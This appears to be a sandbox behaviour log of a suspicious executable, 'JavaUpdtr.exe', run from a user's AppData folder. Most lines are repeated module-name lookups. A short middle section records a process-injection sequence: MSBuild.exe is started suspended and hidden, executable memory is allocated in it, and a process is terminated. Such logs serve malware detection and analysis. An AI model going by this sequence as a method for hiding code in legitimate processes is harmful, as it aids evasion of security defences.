Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Process Create process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, os_pid = 0x708, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Thread Get Context process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, os_tid = 0x4ec True 1
Fn
Memory Read process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 2130567176, size = 4 True 1
Fn
Data
Memory Allocate process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 False 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_TERMINATE True 1
Fn
Process Terminate exit_code = 4294967295 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
